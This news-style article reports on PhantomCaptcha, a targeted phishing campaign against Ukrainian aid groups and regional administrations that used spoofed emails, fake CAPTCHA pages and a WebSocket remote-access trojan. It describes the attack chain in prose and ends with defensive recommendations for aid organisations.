On October 8, 2025, cybersecurity researchers uncovered a sophisticated phishing campaign targeting several organisations tied to Ukraine’s war-relief and reconstruction efforts. The campaign, identified under the name PhantomCaptcha, aimed at aid organisations including the Ukrainian office of the United Nations Children’s Fund (UNICEF), the Norwegian Refugee Council, the Council of Europe’s Register of Damage for Ukraine, and regional government administrations in Donetsk, Dnipropetrovsk, Poltava, and Mykolaiv.
Researchers from SentinelOne reported that the attackers leveraged fake recruitment messages and spoofed official communications, featuring booby-trapped PDF files and bogus links that led victims into malicious remote-access trojans (RATs). The campaign blends social engineering and advanced malware in a particularly targeted fashion.
The campaign mostly used well-crafted emails that appeared to come from the office of Ukraine’s President, among other authoritative sources. The emails attached PDF documents with an embedded link. When the link was clicked, it redirected the victim to a fake “captcha” page (zoomconference.app) masquerading as a legitimate video conference platform. That page then triggered a WebSocket connection to a remote server and installed a PowerShell command leading to malware installation.
Once the victim executed the PowerShell command, the first-stage downloader retrieved a secondary payload from a remote server. That payload turned out to be a specialised WebSocket-based RAT, installed on attacker-controlled infrastructure. This malware gave the threat actor full remote control, enabling file theft, monitoring, and further payload deployment.
Interestingly, the fake domain behind the video conference lure was only active for a single day before disappearing, contrasted with several months of prep work, including domain registrations back in March 2025. That suggests high operational security and long-term planning by the attackers.
Aid groups became targets
These aren’t just random victims. The targeted parties are organisations operating in or supporting war-affected regions of Ukraine with significant international exposure, financial flows, and donor data. Access to their networks could provide attackers with valuable intelligence or leverage for further intrusions.
Threat researchers pointed out that by breaching an aid group, the attackers could gather information such as donor lists, governmental correspondence, financial records, and project data. Those assets are appealing for both espionage and financial crime. And given that some of the targets operate in regions involved in the conflict with Russia, the intrusion may serve broader strategic goals beyond simple theft.
What makes this campaign unique
Unlike mass phishing campaigns that spray thousands of emails out widely, the PhantomCaptcha attack appears highly targeted and tailored. The initial domain registration occurred around March 27, 2025, suggesting months of reconnaissance before the actual strike. The attacker infrastructure also included “princess-mens.click”, a domain used to deliver Android collection apps capable of harvesting geolocation, contacts, call logs, media, and installed apps from victims.
The use of major web technologies such as WebSockets for the RAT, legitimate-looking intercept pages, and credential-less PowerShell chains shows the attackers were comfortable mixing social engineering, lightweight scripting, and stealth. The combination of fake Zoom links and CAPTCHA pages created both a sense of urgency and legitimacy, two key ingredients for successful phishing.
What the organisations should do now
For aid organisations, nonprofits, and any entity operating in conflict or relief zones, this attack offers several lessons:
- Carefully verify job recruitment emails, especially when they originate from unfamiliar domains or include attachments.
- Never enable macros, allow script execution, or click links from documents received unexpectedly, even from trusted contacts.
- Monitor device registrations, authenticator app setups, and WebSocket connections at scale to detect unusual inbound signals.
- Treat video conference platforms and donation systems as potential attack vectors, not just internal communication tools.
- Perform regular audits of devices, proxy logs, and endpoint activity for signs of asymmetric intrusion—remember that attackers may appear as legitimate users.
When the stakes are high, cybersecurity must advance accordingly. Attackers aren’t only going after financial gain anymore. They’re infiltrating organisations by combining one-to-one social engineering and tailored malware. That requires defenders to shift from “bulk preventive” tactics to “tailored response” strategies.
The PhantomCaptcha campaign proves that even trusted institutions working in humanitarian roles remain at risk of complex attacks. The reliance on legitimate-looking platforms like Zoom and fake cloud CAPTCHA checks shows how infrastructure people assume is safe can be turned against them. Defending in this environment is about constant verification, not assumption.